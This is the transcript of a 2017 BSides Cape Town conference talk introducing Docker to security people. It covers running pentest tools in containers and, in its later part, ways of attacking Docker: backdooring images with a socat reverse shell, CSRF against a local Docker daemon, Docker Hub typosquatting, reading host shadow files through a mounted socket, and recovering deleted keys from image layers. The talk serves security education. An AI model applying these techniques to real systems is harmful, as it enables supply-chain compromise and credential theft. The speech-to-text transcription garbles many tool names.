← All talks

Ross Simpson - Docker for Hackers

BSides Cape Town48:16343 viewsPublished 2017-12Watch on YouTube ↗
Mentioned in this talk
Show transcript [en]

good morning everyone um so talking first today will be ross um he's going to be talking to us about docker for hackers so please give him a hand [Applause] morning everyone um as he has been said my name is ross i'm going to be talking about docker for hackers um i'm a web services developer by day so that's a lot of back-end stuff joining systems bit of optimization and i do some hackery security audit stuff by night so docker's quite a nice fix between those two realms spoken at zcon previously which is gerber conference it's now um oexcon xerox con i think is the spinner from that that started up this year and i had the privilege being

besides previously and i've got two twitter accounts just to make life difficult and a blog where i rant about stuff that's probably not worth reading um so today's talk is going to be most of the introductory we're not dropping any docker o days but um i became aware that a lot of people in security and even devs don't know very much about docker and to me it's one of the most useful tools recent times so i kind of just want to make a case for why it's worth using show you different use cases a little bit of how to use it i'm going to skip over some steps so this does not replace like a

getting started guide by all means if you're interested go and read a proper docker getting started guide but i've just tried to highlight a few interesting points hopefully for inspiration or for warning so ultimately docker is a tool for running containers which doesn't explain a whole lot but a container is typically a single application or service and as dependencies so it's a nice little bundled ready-to-run thing it's not an operating system it's not a virtual machine it's literally an application and it's dependencies and it's in a standardized format so the idea of containers is not something new docker didn't necessarily invent anything but they did a lot to standardize it so it's a bit like the raspberry pi it is sort

of the de facto container running solution at the moment although there are many others and a lot of times when people are talking about containers what they actually mean is images images are a little bit like an iso file so that is the collection of all the layers and the parts the information about what is to be run and a container is an instance of that so one image might be run 10 times so you have 10 running containers but only one actual source image that it's come from and yeah doctor's really popular with devops and micro services because it allows you to very easily manage um sort of the deployment of these things scaling of them if you've got

micro services they need to talk to each other rather than running a whole lot of virtual machines you can run much smaller docker images so i've mentioned virtual machines a few times docker has similarities to virtual machines in that it uses images that you can pass around you can build it once and deploy it all over the place people can share it on a network it's great if you're a dev you can keep like a snapshot of your environment and then sort of spin it up as you need to run different versions maybe tweak something for staging or something like that it also uses the host's hardware resources so there's a client and server aspect server aspect will be the host

that's running the virtual machines obviously can't use more ram or disk space than the host has and you need to accommodate for the number of containers that you're running on that host sort of divide out the resources you can also mount in shares so that's really useful feature you can have like a shared directory that a lot of containers run i'm same with virtual machines and also virtual networking so there's bridging options there are host networking options so there's a little bit of security that brings you in terms of isolation a lot of flexibility so a lot that's in common with virtual machines there's also a lot that's not in common with virtual machines so

if you build a virtual machine using vagrant you probably use something like debian ubuntu is your base image and you're probably going to end up with a couple of gigs worth of uh images and if you've got a dev uh vm and a staging vm and a broad vm and sort of a branch version you're probably looking at like five different vms at five gigs each tune for 25 gigs whereas uh docker uses much much much smaller images because it's just your code any files you've attached in dependencies you're probably working in megs or tens of hundreds of macs rather than in gigs and they also share layers so when you pull down ubuntu once and everything

branches off ubuntu you've got that sort of two gig layer once and then 100 mega layer 100 layer 100 layer for your different environment so it uses a lot less space it's a lot easier when you have like a ci server and you're working over vpn you don't have to pull down 25 gigs to get your environment up another nice feature is the command line interaction unlike vagrant you don't have to ssh into a docker container to do things or connect with remote desktop you can actually pipe stuff in and out of it you can run it in your command line pipe the output and then use your native operating systems tools to do other things so it feels a lot

more native the tools that you're running are a lot more accessible and reusable one thing that i see is a bit of a downside is that the cpu is not emulated when docker containers are running you can actually in your host linux operating system for example type ps or top and you will see those docker they've got the separate pids and it's docker running processes so it's very much in the same space as your host so if something does go horribly wrong your host is potentially compromised there's obviously a lot of steps towards isolation so that shouldn't be a concern but do just realize that these are actually processes running on your host with some sort of safeguards in place

it's not sort of one big ball that's emulated that is running inside and docker runs pretty much everywhere these days mac os windows linux the cloud even raspberry pi's which i found quite interesting again there are client and server aspects so sort of mileage varies depending on what you're doing but ultimately the docker client at the very least should run almost anywhere allow you to connect to a docker host start stop view there's things like that there are official images these are trusted and you can download them from store.docker.com so docker is also the organization they vet a lot of these images pretty much put their stamp of approval on them so for example if you

pull down the ubuntu image they've checked it out they make sure that it's fairly stable reliable things like that so when you use just ubuntu without any kind of namespace or prefixing or username that's coming from the docker store trusted by docker there are also community images so any one of us can push our own image up to docker.com they've got hub.docker.com store will let you look at hub images basically the idea with the store like in app stores those are sort of certified pre-built images whereas hub is much of a free-for-all and it's prefixed with the username of the person who pushed that up so i could fork the official ubuntu one but i can

never replace it i can only end up with my own version of it so it's a lot like get with forking um you can also use a private repository again like get for your network for your vpn things like that you can push images to your own image sort of storage and pull them from there you don't have to use the official docker.com sites but it is obviously the easiest way to get up and running and then when you pull down an image when you reference it it's downloaded to your machine so any other time you reference for example the official ubuntu or the namespace one it will keep using them of your machine when you create them initially they're

saved to your machine you have to intentionally push them up to docker hub if you want them to be publicly available so as i say it's pulled down locally most of what you're building is local and pushing up is quite trusted and and also use the names that are in use on store.docker.com so we could push an image called ubuntu locally or to our own repository there's no sort of global restriction on names just with their store.docker.com in the same way that if i run a private github private docker repository i should be able to name my container anything even if you've called you'll contain the same name to your repository there's no communication there's no

global network or anything like that but it does mean that you can't always trust the name that you see unless you also check where it's pulling from if it's not coming from docker.com there's no guarantee that ubuntu is the official docker authorized um container so just be aware of your image so there's quite a bit of theory um so let's take a look at what it actually is so this is a very popular bsd tool game called fortune saying on your screen i happen to be using a mac and if i try and run fortune on mac it's not there if i do yes i probably could just brew install it but we can also do it with docker so

let's take a look at that mention the docker store so here i've done a search you'll see in the address bar the source is the community so it's actually pulling from the hub's collection of images but this is the store's ui there's one in the middle there with 307 pulls fortune come on so that looks like one that we can give a try this is the hub page so it's showing the same information slightly different ui and again you can see the same image so we're going to give that one a run so what we do is we copy the full path so that's the username forward slash fortune and we type in docker run and we specify

that name the text gray is what docker does so it says it can't find that image locally it's now going to try and pull it down from the store i mentioned there's lots of layers so here you can see there's two layers that it's pulled down those layers would be reusable if this author has made some other containers there might be some reuse to speed up downloads and caching and things like that ultimately end up with a hash for that image that's been downloaded it tells you that it's downloaded and it then runs the container which puts out a bit of a grim message but that is the result of fortune and as i mentioned previously this is

running in a terminal so i haven't had ssh into anything i can just select and copy and paste that i could pipe this out so i really like that command line interactability with it this is not an official output i've just put this on my slide so you can get an idea as we're using different containers what size we're in for so this was a fresh mac install with just docker i wouldn't have to install command line tools homebrew things like that if i just want a four meg app so assuming dock is installed i just had to download four mics and it's taking four minutes of desk space so very very minimal again compare that to vagrant

with an ubuntu image and for three gigs just to install a full mac app not very ideal so let's take a bit of a more practical look at using docker for something interesting we're going to run apache web server and by default docker is going to use bridge networking so you're able to get internet access incoming or at least accessing incoming but you have to intentionally tell it to do that so to run apache web server first thing i'm going to do is make an html directory i'm just going to output some text into that directory as index.html so this is my local machine no magic happening just yet what we want to do now is serve that on

the internet or network you can tell docker to run in uh daemon mode that's the minus d after the docker run command we can tell it to share port 8080 of the host machine connecting to port 80 of the container that's going to be running so that's our port mapping basically opening up a port allowing it to come into the docker container the minus v lets you mount in a volume so again this is the html directories on the host machine we need apache that's running in the container to have access to it so we mount the volume in using our current directory for html separated by a colon we're telling it where it is in the file system of the

container which is user local apache to hd docs so now that we've configured everything we're able to run the image httpd that's actually apache there's no username before this is coming from docker and this is going to be their trusted image again it can't find the image locally it starts pulling it you see there's multiple layers you can see the very first layer there already exists so that didn't need to be downloaded again it's reusing these layers so the more you use docker the less and less and less you're going to end up actually downloading every time there were some layers that it needed to download it downloads in parallel which is quite nice you see progress and you

can see how much you're downloading again you get a hash at the end so that's the image this is actually not the container this is actually also the image name that's the image id so i've labeled that incorrectly but um it's now started so we actually returned to our command prompt and like last time it didn't do any output because we ran into demon mode we get our command prompt back it's running in the background and if we open our web browser we go to the hosts localhost port 8080. so again no vmc desktop sharing fighting with browsers you're using your native tools that you're already used to it connects localhost port 8080 it's piped in and apache is now serving that

index.html file that's actually on our host machine again our host machine so we're able to change that text so we're going to strike out hello world and change it to hello hackers we're just piping it to that file on our folder or in our directory and if we refresh our browser it's immediately refreshed so there's no syncing that happens it's not like docker imports or has to poll or anything like that it's literally like a sim link it's mapped to the host machines directory anything that happens there happens for apache inside docker right away i mentioned it's running in background so if you run docker ps it's like a process list here you can see all the docker

containers that are running far left is the container id it's different from the image id if we spun up multiple copies of this image each would have their own container id so this is a way that we can reference a specific running instance it tells us what the image is which is httpd tells us the command we won't worry about for now and we can see the ports that are mapped so we can ask for the logs from that running container if we want to do some kind of debugging make sure it started up correctly we can see apache logs that are happening there that's what it's outputting to its virtual terminal inside docker we can also

get a bash session into that container so this is kind of like vagrant ssh there's no ssh service running but basically what we're saying is we want to attach to this container not necessarily view what it's doing in the primary terminal but it's like we want a secondary terminal so we're able to run bash inside of that running container and we're saying that we want an interactive pseudo terminal so it's almost like now a second thread that's happening or second process inside the container you can now see the user is root at the same hash of the container and you can see the path that we're in so we can do a listing of the htdocs and

we see our index html file so the docker container thinks this is a local directory it's actually on our host machine and everything just works which is awesome so getting a little more to the realm of hacking very popular tool necto you may want to run that the interesting thing here is the dash dash rm it's almost like incognito mode for containers when a container runs even if the process stops there's still a record of it or a container is running in background so typically you can restart a container that otherwise ended in this case we're saying when this thing ends delete it get rid of any information that i have i wouldn't call this like

audit secure it's just convenience you're no longer taking up that space um and anything that nicto for example writes to the home directory you might not want logs of who you've been scanning so in this case it'll just basically delete the containers that it creates but the steps are very much the same it finds this so here we've referenced a user's version of nicto using alpine pulled it down cache layers things like that in this case we didn't have to tell it to run nekto but we did tell it dash host and example.com so we've passed in the command line parameter and then nico's gone and run and output everything to the screen because we

didn't run into demon mode so this is interactive but we will get a prompt back when it finishes another tool sublister it's one that oops quite like and so i've made a container for it myself it's really really easy to do we'll look at that just now same thing it automatically will run the binary we're just passing in the command line arguments that we need and it will run outputs in color and looks very native it's a little bit large though 257 mix but still nothing compared to running like a vagrant ubuntu or kali linux having to boot up or running a vm just to use one you can get really really interesting with it so if you're doing ctfs or

reverse engineering of hardware you might come across some strange cpu architectures oops not necessarily strange but very hard to work with if you don't have the right tooling in place and for one of the i think it was mwr's hakufu there was a webs binary that i needed to decompile qmu is a great emulator for running stuff but it's quite a big beast to install it's a bit of a pain sometimes stuff doesn't work to run the binary you need like a and this version of debian and cross com piling stuff is also just a real nightmare so what i was able to do is just package everything straight into ducker so i've done a lot of hard work

all you have to do is you just need to pull down my debian mipsal image that i've created here we're running again interactive pseudo terminal because we need to log in this starts up like an actual debian linux environment so we're mounting in our current directory into forward slash host share into the docker container that'll start out by default it starts up with login script or login prompt so you see that over there you log in as root root and you end up root at debian mipsal that's not qmu yet but then you can make the host directory share and you can mount it in and then you can literally so you're in mipsal you

mounted the sharing and now you can run things like file can't run this so here we have a 32-bit mips binary that we could run inside docker via qmu again this is all command line so you could actually pipe stuff into it out of it and you're not sort of fighting with horrible pop-up windows that are non-interactive and stuff like this this is all in your terminal or in ssh or something like that i put a similar one where i pre-bundled a whole bunch of tools gdb s trace so you're up and running just at the cost of sort of 750 megs to a gig of download and one command line and a few steps and

read me you're not fighting with dependencies and kernel versions and things like that so nice thing about docker is once you've figured out what you need to do you're able to kind of script that bundle that and then reproduce that so it makes life a whole lot easier another very nice thing i came across along the similar line is something called dark cross for cross compilation they've got a great git repo i think i've got the link just now what you do is you run their cross forward slash in this case linux on b7 image and you output it remember i said you've got a lot of command line interaction you output that to a script

and it's going to pull down their image because we don't already have it but what happens is it outputs the script that script when run runs their docker container and you can give it commands so what i'm able to do is i have a hello dot c file locally on my mac i've generated their script using their container it's going to end up calling their container and what i'm doing is i'm using the c plus or the c compiler to compile that file i'm putting to hello arm inside their linings arm container so i know that's a bit confusing but for two lines of code my output is not what it should be

okay so i run that command now we're not in the terminal here where i'm running file this is back in the host mac terminal but i've produced an arm executable file and where it's really really useful if you're writing exploits and compiling things for legitimate purposes of course these are all the images that they have and the outputs that they support so you're not fighting with i guess that's like 16 vms you're not fighting with different dependencies command compilation arguments and things like that just by using a different image name to create these scripts telling the script how you want to compile a file you can produce binaries for nearly every platform so that's really really

useful 900 megs but zero effort you're literally running two commands and compiling for on a lot better than getting android studio up and running so let's look at something a little more hackery again and some more command line options so we're going to run metasploit and we're going to link some containers and pass in some environment variables so we're extending our use of docker a little bit more in this case we want a postgres database for metasploit to write its settings and cache payloads and things too so i did have to find containers that would work together there's possibly an easier way but i just wanted to illustrate the principle so what i'm doing here is i'm running in

daemon mode postgres which you can see on the far right and i've just named it msf for metasploit postgres i've set an environment variable with minus e setting the postgres user to in itself doesn't do anything magic but the way this postgres image is created it looks for environment variables and overwrites its default config such as the username so in this case by setting the username to metasploit the default password is what metasploit would try by default so they'll be able to just connect just by changing the username and i don't think i need that minus t there but we're running postgres so that's going to be 287 megs it's going to run a background

then what i'm able to do is i'm going to be able to run again an interactive pseudo terminal linking in the msf postgres so that's just a name so docker knows what i'm referencing when you run a container it's going to generate a hash i don't want to copy and paste hashes i'm able to just use a name that i declare in the first line i'm able to reuse in the second line but when it's mapped into metasploit it's just going to be called postgres so it's mapping sort of a friendly name for me to a local name and then i'm going to forward port 8080 to 8080 metasploit and i'm mapping my home folder in because i

want when metasploit outputs data from the roots metasploit inside the docker i actually wanted to come out into my host machine so i can reuse any output logs hashes things like that that it might have come across and in this case i'm using some guy called m douglas's metasploit container which is able to connect to the postgres one so we're in for called 300 and 700 meg so for one gig you've got medsploid up and running you haven't fought with installing ruby gems native compilation or anything like that you've still got the output to your home directory you've got a reusable postgres so everything's going to be cached you're not scanning every time and building up databases and

libraries um and you'll be able to update this you've got docker running so your metabolic running in docker really really easily so again we just the principle here is you're able to link in one container to another so they can also network and know about each other and environment variables but what about carly we've looked at a few tools everyone knows that kali is the operating system of choice what about running kali inside docker i said earlier that docker is normally a single application and its dependencies only is a whole distro of linux it's quite common for there to be images like ubuntu or debian they come with tools like apps you get etc folders

bin folders so they sort of break away from the rule a little bit they're sort of this whole operating system platform and the kali guys have done the exact same thing there are official images that you can get from their website it's up on docker hub and you can just pull it down just docker run interactive pseudo terminal kali linux docker and the command that you want been bashed that'll drop you into a carly shell there is a problem though they're not shipping the live dvd that you might run or install it's not sort of eight gigs of of kali linux with all the tools installed it's just the bare bones so you've got app the repositories

are there the tools are there the folder parts are the same so it's everything you're used to you just have to install the tools itself so what you don't want to do is you don't want to dock a run kali pull it down to your machine and rush off to an engagement where you have no internet access you won't be able to use that image as it is but by all means set it up configure it you're able to save the changes that you've made make it your own pull down what you want use your own version of it but rather than just making manual changes we can actually script those changes so the way docker images are

traditionally built is with something called a docker file this is like a build recipe for them and there's several lines that go into it so we're going to make a custom version of kali linux for our use in the docker file we specify where we want to start what we want to build from in this case we're using their official image it's got everything that we want in order to install our packages now there's quite a few options for that first line of the docker file they've got something called scratch that you can reference which is literally empty it's like no it's a void zero megabytes nothing that's great if you have a binary that

you want to run on its own an example might be something like busybox it might be something that your company has produced you don't need a whole linux subsystem perhaps to run your single standalone binary so you can just map your binary in and there's no underlining layer at all so your docker size should be almost the same as your actual binary that you've pushed in i mentioned busybox that's a valid layer that you can pull down if you need some command line tools 1.13 megs so that's really handy to build on top of if you need to do a few things piping tailing gripping things like that ubuntu is very popular but it comes in

122 megs it's also very bare bones you've got the cli tools you've got apps but it really doesn't do much and you're going to start pulling a whole lot of packages and dependencies as soon as you start building on top of it and then you have alpine linux by comparison it's only four mix it is almost like the open wrt of linux for desktop computers i'm not necessarily saying you should use it as a desktop os but it's amazing for docker a lot of the official images have now started switching over to alpine the images are a lot smaller for all of the same functionality there's a packet manager you can get all your libraries

you can compile stuff so if you're not sure which container to you which base layer to use i would definitely suggest giving alpine a try it's got apk instead of apt but all the same functionality um again layers are shared so if you're already building all of stuff of ubuntu it should be fine but if you're putting something out in the public domain if everyone else is using alpine do you want to be the guy that forces your user to download 122 megs that he doesn't have because you're the only guy using ubuntu instead of alpine so please consider using alpine back to building our custom kali learning stocker though we specified where we want to start this will give us

our base layer to build on top of maintainer pretty much just lets people know who made it how to get hold of you then you're able to issue commands that it must run so as docker's doing this as much like a batch file or a bash script we're going to update apt we're going to do a disk upgrade before we do anything so we're going to make sure our kali linux rolling is as up to date as it can be and then in this case we're going to install the metasploit framework nmap and wordlist for password crackers which you can get a few basic tools in there and when you run it drop us into batch

so that we can choose which command to make use of that docker file just say docker build and you point to the directory the file is in so in this case it's pulling an image as i said images will be reused if it's already present you can see that the step two of five is using a cache so if you make changes to this docker file at the end let's say you add a new line at the bottom of the docker file it doesn't always have to do the whole process again you can save a lot of time you can do a lot of sort of upgrading reusing of scripts without pulling down new packages and layers if you do things

correctly i'm not going to get into it now but it's worth knowing that layers are cached and there's various ways you can do to cache or not cache things we've got a local kali linux repo if you didn't know so that's really really awesome once our docker container finishes you can see the commands that it's running as it goes through the various steps right at the end we read step five out of five and it says successfully built f5 eed there are ways to tag it at the time of compiling but we're going to just tag it afterwards so we take the hash that was produced that's an image we tag it under icarly as the name for it

and we can then run my card so we can list it those the images i've pulled down so we've ended up at three and a half while 3.1 gigs after doing app gets and things like that so these we just do inflate quite quickly you can see the nice name on the left and slash the repository of it you can see the image id we can reference either to start it but we're just going to run interactively by name we're now root at dbf so that's the container id and we can then run nmap so we've sort of built our own kali container that image is now snapshotted so we can start it up whenever we want and start new

instances from it just to mention very quickly i said earlier there are different networking options so you can run docker network ls and it will print out stuff docker ads functionality or you want to know what your host supports um that should tell you the options that are available bridge known and host so none would obviously isolate any network and tcp connectivity bridge is used by default so your docker containers can speak to each other but you're going to need to expose ports if you want to be balanced um docker network inspects is quite useful that'll dump a whole lot of networking information as well about a container and your current setup and things like

that but this is probably not too relevant when you're starting a docker container you can use net host this is more risky because it allows it's using your host network inside docker so if someone compromises your running container opens up a reverse shell that host that tc port becomes open so that's internet facing network facing that container is now internet or network basically so use that with caution and previously there was a bug when running in this mode if you try to reboot or shut down the container that message actually leaked out in the hospital shutdown as well so there's some magic privileged sort of connectivity happening there don't use it unless you know what it is you really

want so that's quite cool but what about movie applications something like burp suite what if we want to intercept traffic with docker surely that's not doable we've spoken about command lines so much well we've got a few things we can do x11 vnc which is a vnc server and provides a fake x11 display we could use firefox for browsing and setting and proxy such as burp suite burp suites the app that we want to run and there's something cool called no vnc which is an html5 bmc client you can bundle this all together and create a container which actually listens on a web port provides a web vnc that connects to a vnc server that then

has x11 and runs firefox and burp suite or you can just go and pull this container down that does everything for you and you connect to your local host on port 80 it starts you see a window manager linux environment and here i've got firefox open in the background burpz burp suite in front this is all happening inside docker there's no evidence of this on my machine when i'm done i can delete this file and all that goes away i haven't had to install burp suite java things like that all contain it and i haven't given access to my actual host display or anything crazy like that so that's really useful so that's just a really quick fly

through of using docker the things that you can do command line gui building images but we need to talk about attacking docker because this is a hacker conference this might not be too relevant but i did find this information really interesting if you get a docker container or you run a docker image you don't necessarily have shell access or root access so if we take that nicto image that we ran earlier and we tell it we want to run shell rather than pass in command line options we get an error we see nicto started and it's given us an error that no host was specified but we didn't want to run nekto we wanted to run shell

the reason for that in this case we've got a docker file we can look at is that along with the from line and the maintainer they've specified an entry point so that's what happens when this container starts it's going to run this entry point and the command by default will be minus h printing does help what we've done is we've only overwritten the minus h so rsh got passed to the entry point a bit confusing and um people have sort of debated which should come first but it's just worth knowing that you've kind of got two layers of execution the entry point and the command luckily all we need to do is we're able to specify a different

entry point in this case changing it to sh rather than putting the sh at the end and in this case we get dropped to the command line so we've got bash inside that container but if we do a who am i we're a user we're not root the previous case we saw that we were root um this is just another line inside that docker file when it's built it says you know the user for this container is user but there's just one other command line option we can just say hey docker i want to be rude so if you're building containers and you think that this has done anything to secure the code that you're shipping it

hasn't it's just a convenience that the user starts up in a certain user mode they can run whatever command they want and they can be rooted in your container so don't think containers are locked or secure or anything like that what about finding sensitive data inside a container we've spoken about these images that are available in docker hub companies might have them running on devs machines on servers private repositories things like that so let's run a container that i created specifically for this demo so it is a bit of a silly example but we're running again interactive terminal the container that i've created with bash and we're just telling it to list files and key

dot pub public key right what could possibly go wrong nothing it's a public key but let's take a little bit of a deeper look at this container you can ask docker to tell us the history of it now there's this really interesting layer over there at the eight minute mark so this is sort of how it started up this is busy box there's a 906 byte layer and then a 300 byte layer it seems like more layers than we would need if i've just pushed in one file we can ask docker not to run it by name but to run that image layer and do the same thing cap the public key certainly is a private key

so if you do something wrong when you're building your container or if your environment is perhaps building a production container and then afterwards you're sort of slipping in dev credentials and pushing it to your dev server if someone compromises it they can still go and access those files and those config files that you think you've overwritten and committed in dev mode your product creates could very possibly still be there something else that you can do which is kind of fun is you can tell docker to save a container name that's going to output it out of the docker ecosystem to a file on your computer or in this case to a pipe i'm just running it through strings and

because private keys are strings the strings command does a really good job of finding this so this is kind of flattening all those layers but it still hasn't erased that image even though i've overwritten it fixing the private key with the public key they exist almost as different parts so the file system doesn't see this file anymore but the data is still there in those docker images but that's a string so that's quite easy to find what if there's more interesting stuff how about undeleting files this isn't even necessarily a hard drive image these are layers of changes and files well you can do docker save again this time we're going to output it to a

binary file testdisk and photorec are great undelete tools for all platforms they find tons of different file types so i extract that image i'm not even aware of what the file system looks like or how many layers i'm just snapshotting the whole thing to a local file that i can use i'm running an undeleter on it and it finds nine files from busybox and if i happen to find the right file you can see it's dug out the private key so there could be binary files image files all kinds of things inside your docker images they're not safe even if they're deleted even if they're not referenced people can still do undeletes on produced containers even if it's not the

latest image that has that stuff so if you've done stuff ages ago if you've built off images someone else has created you don't know what's lying under the file system that you can't even see let's imagine now that we're a malicious dev at a company or we get access at a company or someone's machine what about backdooring images you said before the people reuse things like ubuntu so what we're able to do this is going to be a bit complex but just bear with me we're able to inspect an image such as ubuntu we're looking for the entry point or the command as i mentioned that's the sort of two commands that could happen when the containers run so we want to

see what a target image does when it starts up what the default behavior is it's useful to copy that command then we can run the image and this time run bash instead so this assumes you do have access to the image so you've either got a person's docker hub credentials or you're on the network or something like that in this case i've been using ubuntu i'm going to do an app get update and i'm going to install socat which is a great reverse shell tool i exit out of it do docker ps to see the name of that container that i've just created that has um socat installed i'm going to commit it to temp name just

for my sake so i've got a reference to it so i've now got a target application plus socap circuit as a separate container now i run the container that i've created and saved and i pass in the old command and then i run my reverse shell what we do then is we look at the hash that running command and we commit that back over ubuntu when you do a docker commit it saves that image under a new name so in this case all the stuff that we've been doing turns into ubuntu but the reason we've done the second and third step separately is because in step two we ran shell and in step three we ran the old

command on our circuit this command is what will be saved as the image's entry point or the command so now when someone runs ubuntu it's actually running this previous line which is going to be everything it always used to do but start up a reverse shell so if this is a container that someone's using in the workplace it may very well function as they expected but do something really really nasty when they start it up and as i say if this is pushed to docker hub and someone pulls it down potentially bad things happen there's an easier way of doing this the tool called docker scan which will find various vulnerabilities and let you various analysis on containers

but it also has the option to factor them for you so here we're going to save ubuntu again we're extracting it from the docker sort of file management and all the rest we're flattening to a single file on our machine we're able to tell docker scan to process the image modify it trojanize it we point to the file that we want to trojan although that's a minor cell we're actually setting where the reverse shell should go to this does its thing and it produces temp.tar and it tells us the command that we need to run to listen to receive that reverse shell we then tell docker to load this tar file in so this is docker's way of importing and

exporting docker says oh no ubuntu already exists i'll just rename the old one to an empty string and bring your one in as ubuntu latest again we can't push this up to docker hub and replace their ubuntu latest but within someone's local machine or local environment we're able to change what happens when they reference ubuntu in this case we've got a backdoor image let's think about attacking users developers have a whole lot of access these days they're possibly better targets than broad servers that might be locked down we're going to use cross site request forgery on a user when docker runs the daemon can listen on a tcp by default it's a unis unix socket so there's a few things that that

might happen here there's a few cases where it might not be running on a unix socket but a tcp socket but let's just pretend it's running on 127.00 one two three seven five if i visit a page that has so i i visit a website your website someone else's website and there's a malicious code on it that's going to do a forum post to my local host which is it could tell dr daemon to do a build and we're able to specify a remote docker file so this is a script on pastebin i mentioned the network mode host being quite dangerous so we're going to put that in there we want that in oh and i get to choose where that

container that gets built gets called so i can overwrite the local machines ubuntu image now normally your browser would complain about this because there's cross-origin resource sharing and things like that that needs to happen but there's no payload for this post so none of those checks happen this just goes straight through and docker just accepts get parameters on a post request of course we can slip in some javascript to make the form submit so this can all be happening in the background you browse a website you've got docker listening on localhost and the next thing you know your ubuntu image isn't what you thought it was here you can see i've got a four meg

ubuntu image created just now that's not the real image that's the malicious one and if we just ran it with that post happening outside of an iframe or anything this is the output that you would see it's very much like what docker does you can see that's pulling from alpine uh you can see i've echo test to hello.txt and it ends up building and tagging that on my machine as ubuntu so now you're potentially taking over docker from outside the network just by getting people to click on a malicious link i think is quite cool what about typo squatting mission docker hub so you can register any name on docker hub that's not already registered well we

used kali linux just now so let's change the l to a one you can upload any image backward or not under any name you want we're able to reuse kali linux docker in the same way that we could reuse ubuntu it'll just be namespaced with our username so you can just copy and paste their real profile and image and the details for the image in the web interface and just make your own i mean that looks very much like theirs i mean maybe the user won't notice the one instead of an l you can't use unicode unfortunately so you need to be a little creative about your naming but here we have a pretty legit looking version of carly if any of

you would like to install it we can remove the image locally where we built it and we can pull it down from docker hub using the full parts in this case kali one in exports kali linux docker and we can just loop that and we can create docker hub accounts and start that repository so if someone searches for kali or kali linux yeah you get the official one there at the top out of 160 000 results but look what i had on docker hub yesterday so um you probably don't want to install that container i mean i didn't quite reach a million polls or 360 stars but it's totally conceivable you could do that and take the number one position

what about attacking docker networks so let's say you get reverse shell on a box and it's running docker how do you know if you're inside a docker container well there's a few things you can do um i don't fully understand all of them but we're just going to run through some steps slides will be available if you want to play around with this quite often there's a docker emv file there's a bit of a giveaway so you can check to see if that file is present on the machine you can also check various proc settings so in this case if proc process one c group contains docker guess what you're inside docker you can take a look at the proc

one schedule i think it is it's normally in it or pin one and it shows some other stuff if you're inside docker docker assigns hostnames to machines so it could if you see 12 hexadecimal characters it could be a docker generated hostname um looting and pivoting so when you link containers like we did with postgres docker populates them in the etc host file for you so if you've got access to one machine and you want to go looking for other machines start with a host file it'll tell you where to go and look for other things and we'll probably name them so oh look there's postgres server running 172 1702 and it was tagged with msf postgres

that's used for metasploit the way sharing works i mentioned we're able to override the username which you can see in that second last line so that my method is able to find it it pushes all of these into the linked containers so suddenly all these containers have all these environment variables with all these other containers usernames potentially passwords major minor versions ports things like that so within a docker image export can be your friend and just dump tons of creds for zero effort obvious things they'll likely share an ip range so if you in a machine guess ip and map the range you'll likely find a lot of other machines what about running docker inside docker

i mentioned there's a client in the server we're not trying to get docker server running inside docker server inside docker server but the client runs nearly anywhere including inside docker some tools like docker ssh and some jenkins bulls would have you mount the docker socket remember i said it listens on a unique socket not necessarily port some would have you mount that socket into the container itself so if you get access to run code on that machine the container has access to call out to the host and run other containers so what if we decided to run busy box and we mounted in the etc directory of the host inside this busy box and then

we just added the shadow file docker runs as root so the output of this command is the host's etc shadow file in the command line of the box that you've compromised you might want to backdoor them and run an image again this runs on the host machine outside of the containing compromise that can be any image you can push an image to the docker hub you can pull it down from the docker hub you don't have to worry about taking over and back during their existing images if you can pull down something somewhere else you might want to look at their logs maybe they're running some really super secret software and you can't get it

running locally and you don't want to pull it out the system you can just dump the lugs from it you could attach to it kill processors um so yes doing this mapping your docker socket into a container literally exposes the host machine and all the other containers to huge risk i would not recommend that running docker in production is not something that people do very easily so i'm not going to explain it i'm just going to mention these service discovery is hard especially with microservices how does one container know where another one is it's not what if you're trying to run like sharding and load balancing and things like that how does everything know where

to find stuff people don't have such a great solution um you can't rely on ip addresses docker's going to reassign ip addresses so people set up sub domains pointing to proxies so look for them enumerate them look for hardcoded and shared credentials like we said with those emv bars course code you find you'll find a whole lot of stuff within a docker ecosystem and then networking and firewalling is really really hard especially when you've got a network or a host that has sip it's then got perhaps load balancers network range and then the machines have their own network range and things are bridging and things are hosting so what do people do they just open everything because i just

share the ports you know i don't know which network it must be open for let's just open it to the internet you know so definitely scan ports because everything's just going to be connected to everything else in a really really really bad way um attacking the stacks themselves very popular is kubernetes there's a great tool called minikube which will get you up and running locally for minimal amount of work uh this is a very great blog that takes you through it i would definitely recommend looking at kubernetes how people are using it deploying it and misusing it um because yeah that's gonna be one of the really popular ones there's a bunch of other stuff but i

think we're quite short on time so i'm just going to skip over it a great way to do static analysis of docker images docker have got tags that will they've started now rating whether images have vulnerabilities or not really really great if you know someone's using an image go here see if that image has vulnerabilities then go attack them or don't attack them using latest tags using latest tags is generally a bad practice and you can run docker not as root so definitely go check that out if you're going to run docker and then the nist have actually put together a container security guide which is quite useful so that's a bit of cheat sheet and you can do things like

you can now mount your gpu inside docker container for mining or password cracking which is cool there's a boot to route that you can do inside docker to learn more about it we mentioned mini coop you can run the very first unix from 1972 to keep with the theme inside docker dr compose lets you build really big complex networks very very easily with docker uh 25 of docker images have significant vulnerabilities says a recent study so that's really interesting because remember people are building on top of these layers so if a layer is vulnerable anything built on top of it likely is vulnerable too uh you can do access point stuff host access points and all

the rest mapping wireless into docker also really really cool some more security auditing stuff and if you're interested in infosec please come join us at xerox coffee we're on meetup.com we have a website we meet monthly super super coach will get together and if you want to know more about docker talk to the devops guys they've got a meet up and they've got an annual conference to definitely help that i had a bunch of stickers printed and they really really messed them up so you're welcome to get some stickers but you'll have to cut them out yourself i do have another delivery arriving which will probably be at the next xerox and that's a wrap

[Applause] thank you guys um we're quite short on time but are there any questions otherwise chat to me afterwards i think might be better i'll do my best cool thank you guys